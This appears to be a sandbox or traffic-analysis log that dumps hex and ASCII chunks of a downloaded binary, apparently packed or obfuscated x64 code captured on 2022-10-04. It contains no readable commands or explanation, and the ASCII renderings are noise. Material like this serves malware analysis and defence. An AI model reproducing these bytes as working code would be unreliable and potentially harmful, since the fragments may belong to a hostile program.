f9 48 63 c9 f6 c4 ac 49 81 fd e0 7d 75 31 48 03
                                                                                                                                                                                                                                    Data Ascii: QEL1$AfAIAYHcH'1HAH;5HfA;vA3IISAKA*IfH(fA;Afn+AQAobuDLfED1$MDIwAYMcAIAW@fD1$_HcLfO\AQ1$AYHcI}u1H
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15608INData Raw: c0 c9 41 0f 9a c1 31 04 24 66 45 87 c9 41 d2 c9 41 59 66 41 81 f8 12 60 e9 8a 5b 02 00 ff cd 66 41 3b d9 e9 72 05 f6 ff ff ca f5 f8 f9 0f ca f9 e9 30 53 f4 ff 2d 1e 4f dc 0b 35 ff 5b 0e 2c e9 36 96 fd ff 66 41 8b 3b 66 44 0b c2 4d 0f bb c8 41 8a 4b 02 41 c1 f0 58 4d 0f 41 c2 49 81 eb 06 00 00 00 66 45 0f bd c7 66 d3 e7 45 0f bf c6 66 44 0f b6 c5 66 41 89 7b 08 41 f6 d0 9c 45 8a c0 66 45 0f b6 c6 44 1b c3 41 8f 03 45 32 c3 f5 48 81 eb 04 00 00 00 41 f6 d0 44 8b 03 40 80 fe 46 45 33 c2 41 d1 c8 e9 a0 48 f4 ff 49 8b c3 49 81 eb 04 00 00 00 48 63 d2 66 1b d0 49 0f 47 d3 41 89 03 f5 d2 c6 48 81 eb 04 00 00 00 c0 ee 14 8b 13 33 d7 41 80 fb b3 40 84 f0 f7 da f5 0f ca e9 46 20 fd ff 41 33 c9 e9 35 80 03 00 56 c3 f9 49 03 f3 e9 2e 0d 02 00 f9 81 f2 46 05 72 30 41
                                                                                                                                                                                                                                    Data Ascii: A1$fEAAYfA`[fA;r0S-O5[,6fA;fDMAKAXMAIfEfEfDfA{AEfEDAE2HAD@FE3AHIIHcfIGAH3A@F A35VI.Fr0A
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15624INData Raw: 41 81 f2 c0 1a 1b 08 41 f7 d2 e9 b5 64 fa ff 81 fb 04 00 00 00 e9 28 d7 f5 ff 57 31 34 24 40 c0 df 8f 66 0f cf 66 41 0b f8 5f 48 63 f6 66 3b c8 41 f7 c6 69 67 e4 20 4c 03 de e9 7a 18 fd ff 45 3a d0 0f ce 41 84 fc 41 f6 c2 63 66 3b c5 81 ee 4f 00 99 63 e9 d1 c3 03 00 c1 ca 02 e9 fc 4c fc ff 41 f6 c7 ea 3a ec f7 db c1 c3 02 57 f5 66 40 0f b6 fd 66 ff cf 31 1c 24 41 2a f8 5f 44 3a fc 48 63 db f8 3b df e9 61 1f fc ff 48 ff c0 f9 81 f3 fa 19 82 48 e9 ae 18 f8 ff 49 8b 08 66 41 0f bd f1 66 44 0f c1 de c1 d6 d1 41 8b 70 08 45 8a d8 49 0f b3 cb 49 81 c0 0c 00 00 00 41 fe cb 45 22 db 45 0f ab eb 36 89 31 41 84 cb 49 81 e9 04 00 00 00 66 45 0b de 66 41 d3 cb 45 8b 19 44 84 f0 44 33 df 41 81 eb e9 2c 21 14 f5 f8 41 d1 c3 f9 f5 41 81 c3 fa 69 a7 3a 41 f7 d3 57 66 0f
                                                                                                                                                                                                                                    Data Ascii: AAd(W14$@ffA_Hcf;Aig LzE:AAcf;OcLA:Wf@f1$A*_D:Hc;aHHIfAfDApEIIAE"E61AIfEfAEDD3A,!AAi:AWf
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15640INData Raw: 3b eb f8 33 eb f5 f8 f7 d5 d1 cd e9 65 16 f6 ff f5 f7 df d1 cf f5 f7 df e9 98 32 f5 ff 66 41 81 f9 98 55 48 63 ff 66 41 3b f9 48 03 f7 e9 2b 31 f6 ff 48 89 47 08 9c 66 44 0f a4 f8 c0 8f 07 8b 03 f9 e9 00 79 f4 ff 41 ff c3 f6 c6 f2 41 f7 db f9 44 84 d7 66 41 f7 c5 72 5d 41 81 c3 6d 7d e6 6c f5 41 81 f3 40 67 54 7e f9 f5 41 51 66 41 3b c8 44 31 1c 24 66 45 0f a3 c1 41 59 f9 40 84 e6 4d 63 db f8 40 80 fc 0d f9 49 03 f3 e9 fc 24 f4 ff f8 41 33 ea 81 ed 03 36 2a 74 f8 c1 cd 02 81 c5 dd 1c e8 75 c1 cd 02 f9 41 52 41 80 d2 de 41 d2 e2 44 0a d4 31 2c 24 44 3a e5 44 22 d2 66 41 f7 da 41 5a 45 85 fb 48 63 ed e9 fa ce f6 ff ff ca c1 ca 02 f9 45 3b e5 f7 da 53 48 c1 e3 b5 31 14 24 66 d3 d3 d2 e3 5b 66 44 3b ca 48 63 d2 4c 03 ca e9 f4 e6 f7 ff ff c1 f8 f9 4c 3b e4 0f
                                                                                                                                                                                                                                    Data Ascii: ;3e2fAUHcfA;H+1HGfDyAADfAr]Am}lA@gT~AQfA;D1$fEAY@Mc@I$A36*tuARAAD1,$D:D"fAAZEHcE;SH1$f[fD;HcLL;
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15656INData Raw: 76 c7 97 2e e8 51 a7 29 9f eb f6 20 06 7d c6 27 71 40 eb 41 c7 d6 db 46 b0 6c 8a 4f 29 fa ba 48 5e 59 2f 2c c0 cf 1f 2b b7 75 4e 22 2e e3 7e 25 59 72 63 9a c9 e4 53 9d be 5e 02 94 27 c8 32 93 50 6b a7 f7 ce fd 97 f0 b9 47 c6 f9 20 d1 f6 fe 57 24 fb f6 da b2 cb f1 ad 08 9a f8 34 9e aa ff 43 3d 3f 9b dd ab 0f 9c aa 11 5e 95 33 87 6e 92 44 16 73 2d d4 80 43 2a a3 3a 12 23 3a ac 22 24 4d 0f b7 40 d3 99 87 47 a4 23 d6 4e 3d b5 e6 49 4a f7 d6 e9 a3 e7 f5 ff 41 ff e0 41 8b 12 41 d2 d8 45 8b 42 04 86 c9 41 8a 4a 08 c1 f8 04 66 41 0f b6 c2 49 81 ea 02 00 00 00 66 81 fb 89 55 41 0f b7 c4 66 44 0f ac f0 cc 44 0f ad c2 66 98 b8 bd 14 b4 44 e9 8a 6e fe ff f6 d3 81 db 4d 5e 3b 04 5b 80 fa 0f 48 63 ed f8 66 41 f7 c4 7d 7a 4c 03 cd e9 25 b8 f0 ff 48 8b 03 8a 4b 08 41 0f
                                                                                                                                                                                                                                    Data Ascii: v.Q) }'q@AFlO)H^Y/,+uN".~%YrcS^'2PkG W$4C=?^3nDs-C*:#:"$M@G#N=IJAAAEBAJfAIfUAfDDfDnM^;[HcfA}zL%HKA
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15672INData Raw: 48 81 eb 04 00 00 00 44 0f b3 f0 8b 03 33 c7 e9 65 8a 03 00 f7 d5 e9 a2 59 03 00 41 ff cb f8 41 81 f3 2d 43 57 43 f9 41 f7 db 57 66 8b ff 66 0f b3 cf 44 31 1c 24 5f 40 3a f5 f9 e9 84 3b fe ff 81 fb 04 00 00 00 e9 af 4d fb ff f7 d0 ff c8 56 48 0f 4b f4 66 87 f6 e9 eb 52 fd ff 0f cd e9 8b e9 ff ff 41 ff c1 66 45 3b f3 55 48 81 cd a9 43 73 31 40 0f 9b c5 44 31 0c 24 e9 23 da f4 ff 0f ca f9 c1 c2 02 57 40 fe cf 40 0a fc 66 44 0f ab df 31 14 24 40 1a ff 66 0f bd f8 41 32 fb 5f 44 3b cb 48 63 d2 f8 4c 03 c2 e9 2a 2c 00 00 d1 ca f9 81 f2 44 20 06 38 d1 ca 57 49 0f b7 fb 31 14 24 41 8a fb 5f 41 f6 c6 a9 48 63 d2 3a dc 4c 03 d2 e9 cd 0b ff ff ff e6 49 8b 3b c0 c9 28 45 84 e9 fe c1 41 8a 4b 08 f5 49 81 eb 06 00 00 00 48 d3 e7 e9 3c 4d ff ff ff 74 dd 20 e9 3b d4 fa
                                                                                                                                                                                                                                    Data Ascii: HD3eYAA-CWCAWffD1$_@:;MVHKfRAfE;UHCs1@D1$#W@@fD1$@fA2_D;HcL*,D 8WI1$A_AHc:LI;(EAKIH<Mt ;
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15688INData Raw: 41 85 e7 03 f8 e9 e2 9a fc ff 56 c3 44 0f ab e2 49 81 eb 08 00 00 00 66 ff ca 4d 89 0b 66 87 d2 44 0f a4 d2 8a 80 f2 b9 48 81 eb 04 00 00 00 81 da 21 2a cd 1c 8b 13 f9 41 3b ea 33 d7 f9 45 3a fc f8 81 ea 91 25 7c 60 66 41 3b d4 f9 44 84 e0 0f ca 81 f2 af 0c 7f 4a e9 ce de f0 ff 4d 8b 18 66 0f bd d4 48 0f cd 66 0f ba f2 b0 41 8b 50 08 40 22 ef f5 49 81 c0 0c 00 00 00 40 80 c5 d7 41 89 13 49 81 e9 04 00 00 00 41 8b 29 f5 44 85 f2 33 ef 66 44 3b d9 81 ed 40 21 5d 69 e9 23 8b fd ff 48 81 c7 0c 00 00 00 45 2b c9 41 80 fe 87 f5 48 85 c9 e9 e0 39 fe ff 41 51 c3 f8 d1 c2 ff ca 3a c7 81 f2 c2 00 4f 22 45 84 fb 81 c2 50 05 ea 61 f8 41 51 45 2b c9 41 d2 e9 41 d2 c9 31 14 24 4d 0f a4 e1 52 e9 41 81 f4 ff 45 84 c6 66 81 fa c1 3d f7 df f5 c1 cf 02 41 f6 c0 0f 48 85 cb
                                                                                                                                                                                                                                    Data Ascii: AVDIfMfDH!*A;3E:%|`fA;DJMfHfAP@"I@AIA)D3fD;@!]i#HE+AH9AQ:O"EPaAQE+AA1$MRAEf=AH
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15704INData Raw: f0 ff 45 8b 09 41 c0 d2 76 66 45 0f b3 f2 66 41 f7 da 48 81 ed 04 00 00 00 44 8b 54 25 00 45 3b ec f5 66 45 85 dc 44 33 d7 41 81 c2 41 17 0a 14 41 c1 c2 02 81 fa 98 27 b9 29 f8 41 0f ca 66 41 81 f9 f2 7f 41 81 ea ba 4d 85 68 f8 45 84 f6 40 80 fc 51 41 0f ca 57 44 31 14 24 48 c1 d7 af 5f f5 4d 63 d2 f5 f8 4d 03 da e9 f9 90 fa ff 41 80 f9 2c 4c 03 d0 e9 72 32 f6 ff f8 81 eb e5 29 5d 20 f7 db d1 cb e9 9f c2 00 00 f7 d6 e9 b4 6e fc ff 0f 85 26 57 fd ff 4c 8b c0 e9 29 46 fc ff 49 8b 40 08 66 0f be f1 40 8a f3 49 8b 10 f9 41 0f b7 f1 49 81 e8 08 00 00 00 48 63 f1 48 f7 e2 0f b7 f1 40 8a f1 49 89 50 08 49 89 40 10 40 0f 9e c6 9c 48 0f bf f1 66 41 23 f1 41 8f 00 49 81 e9 04 00 00 00 41 8b 31 f8 33 f7 66 44 3b c0 44 84 d7 f7 de 0f ce f9 c1 c6 03 41 80 fe 64 f7 d6
                                                                                                                                                                                                                                    Data Ascii: EAvfEfAHDT%E;fED3AAA')AfAAMhE@QAWD1$H_McMA,Lr2)] n&WL)FI@f@IAIHcH@IPI@@HfA#AIA13fD;DAd
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15720INData Raw: 42 66 41 d3 c2 41 59 66 44 0f be d3 41 5a 66 0f bd d0 0f 42 d4 49 81 ea 04 00 00 00 d2 ee 41 32 d2 41 8b 12 f5 33 d6 e9 4a 16 02 00 81 ea ed 36 60 53 f9 f5 53 31 14 24 48 0f bd de 41 2a de 5b 66 44 85 db 48 63 d2 45 84 fd 4c 03 ca e9 17 df f3 ff f7 d2 80 cc 46 4c 0f a4 e0 9d f7 d6 0b d6 41 0f b7 c1 41 89 51 08 66 0f c8 8b c1 9c 48 33 c3 41 8f 01 66 c1 e8 ea 48 81 ed 04 00 00 00 41 02 c2 8b 44 25 00 41 85 dd 33 c7 f5 c1 c8 03 f9 45 3b ce 2d 09 68 1b 3e e9 6a e8 ef ff 49 8b 1b 49 8b 43 08 66 45 3b ee 49 81 c3 0c 00 00 00 f8 e9 91 52 fb ff 4d 8b 13 66 c1 fa 1d 66 0f ba e2 fd 66 41 8b 53 08 49 81 c3 0a 00 00 00 e9 f0 79 f8 ff 41 f7 d0 e9 55 fd fc ff fe c3 f7 c2 d3 2b c4 4b 0f bd ef 66 81 da 61 19 40 32 fb 40 0f 97 c5 66 0f ca 41 51 41 52 57 0f 90 c2 48 0f ba
                                                                                                                                                                                                                                    Data Ascii: BfAAYfDAZfBIA2A3J6`SS1$HA*[fDHcELFLAAQfH3AfHAD%A3E;-h>jIICfE;IRMfffASIyAU+Kfa@2@fAQARWH
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15736INData Raw: 66 81 fb 07 25 44 3a c1 0f ce 66 41 81 fe d1 0e 57 66 0f 41 fe 66 44 0f a4 d7 b0 e9 f0 a6 f4 ff 41 56 41 51 48 98 55 9f 48 98 41 52 41 0f 94 c1 45 0f bf d6 48 0f bf ff 41 57 41 ff c8 41 53 45 0f bf ca 45 0f b7 cc 49 ba 00 00 00 00 00 00 00 00 66 41 87 d8 fe c0 41 52 48 8b 9c 24 90 00 00 00 66 41 90 66 98 66 41 0f b6 c4 ff cb 66 c1 c0 16 e9 ad 90 f3 ff d1 c0 81 fd 4a 58 ad 15 f5 05 cb 37 fa 46 c1 c0 03 f8 f7 d8 f5 0f c8 f5 f7 d0 f5 e9 2a 70 fb ff 41 f7 d1 41 0b d1 e9 48 fb fb ff ff c3 81 f3 6c 6a d5 56 d1 cb 66 41 3b c2 f6 c1 97 41 51 31 1c 24 41 d2 c1 41 59 f8 48 63 db 41 80 ff bb f9 48 03 f3 e9 06 9c f4 ff 66 44 3b dc 4c 03 d3 e9 dc 18 f5 ff f8 35 b9 6a 64 56 f7 d0 e9 ac d9 f5 ff 0f 85 aa 47 00 00 48 8b d0 e9 25 c2 fc ff 44 0f b6 06 48 0f a3 e9 66 41 f7
                                                                                                                                                                                                                                    Data Ascii: f%D:fAWfAfDAVAQHUHARAEHAWAASEEIfAARH$fAffAfJX7F*pAAHljVfA;AQ1$AAYHcAHfD;L5jdVGH%DHfA
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15752INData Raw: 4c 50 0f cb 40 80 fe d6 f7 db e9 6a 7d f9 ff 40 b7 95 9c 41 8f 03 66 0f ba ff d8 66 41 0f b6 fc 44 0f ac cf 68 49 81 ea 04 00 00 00 66 44 0f b3 d7 66 d3 d7 4c 0f ab d7 41 8b 3a 40 3a c5 44 85 e1 33 fe e9 7d f8 f7 ff e9 e2 c5 f4 ff 49 8b d1 49 81 e9 04 00 00 00 48 a9 2c 24 5e 72 41 89 11 48 81 ed 04 00 00 00 f5 8b 54 25 00 e9 a8 3b fb ff 49 8b 30 40 12 ed 40 80 e5 a8 41 8a 68 08 49 81 c0 0a 00 00 00 40 84 fe e9 58 39 f4 ff ff c8 49 81 fd 8f 35 cc 00 e9 16 be fc ff 49 89 53 08 49 0f bf ca 66 b9 ca 3b 41 0f bf cc 9c f9 49 0f bd cd c0 f9 9d 41 8f 03 66 d3 c9 48 81 eb 04 00 00 00 d2 cd 8b 0b f5 33 cf ff c9 c1 c1 02 66 81 f9 d1 1e 66 41 3b eb e9 4d 46 f8 ff 0f cd e9 ea ef 00 00 41 8b 03 41 8b 4b 04 49 81 eb 04 00 00 00 66 44 85 e1 03 c1 e9 3c 00 f7 ff 45 84 da
                                                                                                                                                                                                                                    Data Ascii: LP@j}@AffADhIfDfLA:@:D3}IIH,$^rAHT%;I0@@AhI@X9I5ISIf;AIAfH3ffA;MFAAKIfD<E
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15768INData Raw: c9 40 32 e9 f9 66 45 85 ef e9 14 18 fd ff 4d 8b 13 48 d3 ca 0f ba fa 77 66 40 0f be d6 65 49 8b 12 66 41 81 e2 f4 5f 49 89 13 48 81 eb 04 00 00 00 41 d2 e2 41 80 e2 da 44 8b 13 44 33 d7 41 81 c2 f5 5b 14 26 41 0f ca 41 81 f2 01 34 5c 69 f8 41 d1 ca f8 41 84 de 41 3a f3 41 f7 d2 66 81 fe 5c 16 e9 b1 1c 01 00 41 8b 00 c6 c7 94 45 3a ec 0f a2 44 84 c2 40 80 c6 53 49 81 e8 0c 00 00 00 66 81 f6 94 75 41 89 40 0c 66 0f 4a f0 66 44 3b f2 81 d6 a8 21 11 01 41 89 58 08 48 0f c1 f6 41 89 48 04 0f ba e6 1c 41 89 10 66 0f ac e6 ce 40 32 f1 49 81 e9 04 00 00 00 66 0f bd f3 41 8a f4 f8 41 8b 31 49 81 fd 6c 55 fa 50 33 f7 81 ee b1 18 6c 27 f9 0f ce 48 3b c3 f9 41 f6 c4 e7 f7 de e9 9d e3 f4 ff 4c 8b c7 66 41 0f bc cb 0a c8 48 81 ef 04 00 00 00 66 41 03 ce 44 89 07 80 f5
                                                                                                                                                                                                                                    Data Ascii: @2fEMHwf@eIfA_IHAADD3A[&AA4\iAAA:Af\AE:D@SIfuA@fJfD;!AXHAHAf@2IfAA1IlUP3l'H;ALfAHfAD
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15784INData Raw: 72 72 73 57 eb e4 43 50 9c 47 d6 34 02 d1 e6 33 75 6b b7 3a ec fd 87 3d 9b 6c 9a 82 0b fa aa 85 7c 40 fb 8c e5 d6 cb 8b 92 75 5e ef 0c e3 6e e8 7b 59 3f e1 e2 cf 0f e6 95 3a 02 ee 18 ac 32 e9 6f 16 63 e0 f6 80 53 e7 81 23 c6 83 1f b5 f6 84 68 0f a7 8d f1 99 97 8a 86 08 8a 35 16 9e ba 32 61 24 eb 3b f8 b2 db 3c 8f 11 4e 58 11 87 7e 5f 66 3d 2f 56 ff ab 1f 51 88 06 73 eb 48 90 43 ec 3f 2a 12 e5 a6 bc 22 e2 d1 1f b7 86 4f 89 87 81 38 33 d6 88 a1 a5 e6 8f d6 34 fb 30 46 a2 cb 37 31 18 9a 3e a8 8e aa 39 df 2d 3f 5d 41 bb 0f 5a 36 01 5e 53 af 97 6e 54 d8 62 63 5c 55 f4 53 5b 22 4e 02 52 bb d8 32 55 cc 7b a7 31 52 ed 97 36 25 57 c6 3f bc c1 f6 38 cb 50 eb 87 5b c6 db 80 2c 7c 8a 89 b5 ea ba 8e c2 49 2f ea 5c df 1f ed 2b 65 4e e4 b2 f3 7e e3 c5 ce 53 85 73 58 63
                                                                                                                                                                                                                                    Data Ascii: rrsWCPG43uk:=l|@u^n{Y?:2ocS#h52a$;<NX~_f=/VQsHC?*"O8340F71>9-?]AZ6^SnTbc\US["NR2U{1R6%W?8P[,|I/\+eN~SsXc
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15800INData Raw: f5 ff e9 ed 35 f7 ff ff cd 0f cd f5 f7 d5 f5 d1 c5 41 51 31 2c 24 41 80 f1 db 66 41 0f ba f9 7e 41 59 44 3b d3 41 80 ff 02 48 63 ed 48 03 f5 e9 8c 01 fd ff 48 63 c9 4c 03 d1 e9 8a 22 f3 ff 0f 85 2f 8f 01 00 48 8b 44 25 00 48 81 ec 20 00 00 00 e9 bb 8a f9 ff a8 97 48 03 eb e9 13 9b f2 ff e9 d2 a3 fa ff d1 c5 f8 81 ed f2 20 d6 76 e9 ed 6d f2 ff ff c7 f5 f7 df 81 f7 54 3a 61 1d ff cf 41 51 66 41 0f bb c9 31 3c 24 45 0f bf c8 41 fe c9 41 59 48 f7 c7 9e 63 10 26 f8 48 63 ff 4d 85 e9 41 81 ff e1 15 b7 62 48 03 f7 e9 30 74 f3 ff 48 63 db 48 03 f3 e9 a1 35 f4 ff e9 34 35 f7 ff f5 f7 d1 0f c9 f9 f8 c1 c1 03 f5 4d 85 e6 41 51 4c 63 cf 66 45 0f bc cf 31 0c 24 41 59 48 85 f5 45 3a c5 f5 48 63 c9 41 84 db 41 f6 c3 1f 48 03 f1 ff e6 66 45 8b 13 66 0f 40 cb c0 d6 58 66
                                                                                                                                                                                                                                    Data Ascii: 5AQ1,$AfA~AYD;AHcHHcL"/HD%H H vmT:aAQfA1<$EAAYHc&HcMAbH0tHcH545MAQLcfE1$AYHE:HcAAHfEf@Xf
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15816INData Raw: 64 fa ff 41 ff e1 48 81 eb 02 00 00 00 66 41 d3 fb 66 44 89 13 44 8b 1f f6 c7 ec 45 84 c4 66 41 81 fa 0c 1d 48 81 c7 04 00 00 00 41 84 d0 f8 45 33 d9 41 ff c3 66 f7 c1 da 3e f5 41 80 ff 9b 41 f7 d3 45 84 f5 f8 41 81 c3 fa 3e c1 79 41 f7 d3 41 81 eb bf 38 a5 46 41 51 41 d2 e1 44 31 1c 24 4d 63 c8 41 59 66 3b df f8 4d 63 db 49 03 f3 e9 cb 1f f7 ff 41 ff c1 f8 f5 41 c1 c1 02 f8 41 f6 c0 a3 57 40 d2 df 41 0a f8 44 31 0c 24 66 41 f7 c3 1b 4b 41 0a fd 66 41 3b fd 5f 40 f6 c5 e8 4d 63 c9 e9 ab 46 f2 ff ff e6 e9 cb 92 00 00 48 99 66 89 5f 08 48 99 9c 8f 07 fe c6 0f ca 8b 16 66 41 85 e6 44 3b f0 48 81 c6 04 00 00 00 66 41 f7 c0 f9 3f f8 48 85 ca 41 33 d3 d1 ca 0f ca e9 4f 86 01 00 40 f6 dd 80 ce f6 44 32 d5 81 e2 d5 43 3d 35 66 8b 3c 2c 0f 97 c2 d2 fe 0f c1 d2 49
                                                                                                                                                                                                                                    Data Ascii: dAHfAfDDEfAHAE3Af>AAEA>yAA8FAQAD1$McAYf;McIAAAW@AD1$fAKAfA;_@McFHf_HfAD;HfA?HA3O@D2C=5f<,I
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15832INData Raw: c0 c0 44 8b 47 04 48 81 ef 04 00 00 00 c0 f4 17 45 03 d0 44 89 57 08 e9 d6 49 f9 ff 49 8b 2b 66 44 8b 44 25 00 49 81 c3 06 00 00 00 41 03 eb 48 0f bb e5 66 45 89 03 41 0f bf ec 48 81 c5 0d 41 90 74 49 81 ea 04 00 00 00 d3 dd 66 41 03 eb 41 8b 2a 33 ee 81 ed ce 2d 98 6b 66 45 3b d6 e9 12 a7 ef ff 4c 8b 1b 40 f6 d5 40 80 dd 07 66 41 23 c3 36 66 41 0f b6 03 48 81 c3 06 00 00 00 66 89 03 8b 2f 48 81 c7 04 00 00 00 f6 c3 06 f5 41 33 e9 41 f6 c3 06 81 ed 25 49 bb 77 66 41 3b d8 81 f5 dc 55 02 2b e9 fa 12 f6 ff 41 f6 c5 bc 0f ca f9 40 3a f6 81 c2 16 46 65 21 f8 e9 67 66 fb ff 41 50 c3 e9 2c b5 f6 ff 49 89 53 08 48 0f b7 d2 0f bf d7 c6 c6 6b 9c 66 0f ca 41 8f 03 0f c0 d6 66 41 23 d4 49 81 ea 04 00 00 00 0f b3 f2 45 3a fe 41 8b 12 f9 41 33 d1 d1 ca 66 41 85 cd 81
                                                                                                                                                                                                                                    Data Ascii: DGHEDWII+fDD%IAHfEAHAtIfAA*3-kfE;L@@fA#6fAHf/HA3A%IwfA;U+A@:Fe!gfAP,ISHkfAfA#IE:AA3fA
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15848INData Raw: 47 3b 81 50 f1 ad b1 57 86 17 e0 5e 1f 81 d0 59 68 22 45 3d f6 b4 75 3a 81 0e 24 33 18 98 14 34 6f 09 09 8b ff 9f 39 8c 88 25 68 85 11 b3 58 82 66 10 cd e6 f8 86 fd e1 8f 3c ac e8 16 aa 9c ef 61 5f 91 e7 ec c9 a1 e0 9b 73 f0 e9 02 e5 c0 ee 75 46 55 8a eb d0 65 8d 9c 6a 34 84 05 fc 04 83 72 6d 19 3c e2 fb 29 3b 95 41 78 32 0c d7 48 35 7b 74 dd 51 e5 e2 ed 56 92 58 bc 5f 0b ce 8c 58 7c 0f 84 d1 05 01 00 4c 8d 05 03 62 ff ff f8 56 48 d3 ee 40 c0 fe 32 0f b6 31 33 f2 81 e6 ff 00 00 00 41 8b 34 b0 f7 c3 88 0e 33 45 c1 ea 08 33 d6 e9 49 61 f0 ff 48 81 c7 04 00 00 00 f8 41 33 c1 f5 e9 76 d7 fc ff ff cd 41 51 44 0f b7 c8 49 81 d9 79 7c 23 20 41 c0 f1 cb 31 2c 24 41 59 48 63 ed f9 48 03 f5 e9 ce 08 fb ff ff c5 d1 cd 56 48 03 f0 31 2c 24 f9 66 c1 ee 62 49 63 f1 5e
                                                                                                                                                                                                                                    Data Ascii: G;PW^Yh"E=u:$34o9%hXf<a_suFUej4rm<);Ax2H5{tQVX_X|LbVH@213A43E3IaHA3vAQDIy|# A1,$AYHcHVH1,$fbIc^
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15864INData Raw: 32 c7 66 45 0f b6 d5 41 fe ca fe c0 d0 c8 f8 41 80 c1 cb 66 45 0f a3 d2 f6 d8 d0 c0 45 0f bf d7 45 33 d3 f6 d8 41 c0 d1 3d f9 d0 c8 44 0f bf d7 40 32 f8 49 c1 ea c4 3b f2 45 2a ca 66 44 8b 0c 04 49 81 eb 02 00 00 00 66 41 ff ca 41 c0 fa 75 41 b2 f9 66 45 89 0b 45 02 d6 48 81 eb 04 00 00 00 66 41 d3 da 45 2b d6 44 8b 13 45 84 ff f5 44 33 d7 e9 6e ac ff ff 41 51 45 0f bc cb 44 31 1c 24 41 59 4d 63 db 45 3a d8 49 03 f3 e9 10 b5 f9 ff 45 33 c2 f8 41 d1 c0 41 80 fc ce 41 81 e8 b3 33 69 65 41 c1 c0 03 84 fe 45 3a f7 41 81 f0 f2 34 3c 27 4d 3b f2 41 52 44 0f bf d3 44 31 04 24 41 5a 4d 63 c0 f8 f5 e9 c1 e8 f4 ff 44 84 d8 4c 03 c0 e9 ee d0 f4 ff 41 ff e1 48 8b e7 5f 41 0f ba f1 7d 41 5f 41 c1 c0 1a 66 f7 d0 41 d2 e8 58 9d 49 87 f4 45 0f b7 e8 0f 9b c5 41 59 66 41
                                                                                                                                                                                                                                    Data Ascii: 2fEAAfEEE3A=D@2I;E*fDIfAAuAfEEHfAE+DED3nAQED1$AYMcE:IE3AAA3ieAE:A4<'M;ARDD1$AZMcDLAH_A}A_AfAXIEAYfA
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15880INData Raw: 04 24 45 8a ce 41 59 40 f6 c6 b8 4d 63 c0 e9 63 a3 fb ff e9 ec 77 ec ff f8 d1 cb ff cb f9 f8 c1 c3 03 40 80 ff 68 e9 d5 38 f8 ff ff c5 f7 d5 f9 c1 cd 02 f8 f9 66 44 3b e4 41 52 66 45 0f be d6 31 2c 24 41 5a e9 62 5c f7 ff e9 9c 27 f4 ff 66 44 0f b6 07 8a 57 02 41 80 eb 1a 48 81 ef 06 00 00 00 41 80 f3 bf 66 41 81 eb ce 61 41 f6 d0 f6 d2 45 33 d9 e9 e7 bd f9 ff 08 23 07 2e 9e 13 00 59 24 42 09 c0 b2 72 0e b7 11 e7 6a 29 87 d7 6d 5e 3d 86 64 c7 ab b6 63 b0 3a ab dc 20 ac 9b db 57 16 ca d2 ce 80 fa d5 b9 23 6f b1 27 b5 5f b6 50 0f 0e bf c9 99 3e b8 be 6c 33 b0 33 fa 03 b7 44 40 52 be dd d6 62 b9 aa 75 f7 dd 34 e3 c7 da 43 59 96 d3 da cf a6 d4 ad 5e bb 6b 3d c8 8b 6c 4a 72 da 65 d3 e4 ea 62 a4 47 7f 06 3a d1 4f 01 4d 6b 1e 08 d4 fd 2e 0f a3 c0 03 69 15 56 33
                                                                                                                                                                                                                                    Data Ascii: $EAY@Mccw@h8fD;ARfE1,$AZb\'fDWAHAfAaAE3#.Y$Brj)m^=dc: W#o'_P>l33D@Rbu4CY^k=lJrebG:OMk.iV3
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15896INData Raw: 66 45 89 5a 08 66 45 0f be c5 45 86 c0 9c 41 c1 d8 ac 45 1a c4 41 8f 02 44 8b 06 48 81 c6 04 00 00 00 44 33 c3 41 ff c0 4d 3b fd f9 41 81 f0 ce 56 63 07 f5 f8 48 81 fe 4c 16 7d 55 41 81 e8 59 71 50 31 41 0f c8 53 44 31 04 24 66 44 0f b3 fb c0 c3 02 66 44 0f a3 f3 5b 48 85 d1 f5 4d 63 c0 e9 4f a6 f9 ff e9 d5 df f5 ff f5 f9 41 c1 c3 02 e9 b6 9d ff ff 4d 8b 12 8b 3e 48 81 c6 04 00 00 00 41 84 ee f8 33 fb 81 f7 f7 3f 0d 1b c1 c7 02 f7 df e9 9c 75 f2 ff 41 ff c0 41 81 f0 60 79 ab 2c 41 f6 c6 5a 40 80 fe 76 e9 4a 51 fd ff 48 63 ed 4c 03 d5 e9 ea 8b fb ff e9 e2 33 f9 ff 41 50 c3 48 8b c7 c1 da c7 48 81 ef 08 00 00 00 99 48 89 07 8b 16 66 41 81 fb 7b 7f 44 84 e4 48 81 c6 04 00 00 00 e9 94 0e f2 ff c1 ca 03 81 c2 25 05 bc 08 f9 f8 c1 ca 02 48 81 fe c5 67 e9 4b f8
                                                                                                                                                                                                                                    Data Ascii: fEZfEEAEADHD3AM;AVcHL}UAYqP1ASD1$fDfD[HMcOAM>HA3?uAA`y,AZ@vJQHcL3APHHHfA{DH%HgK
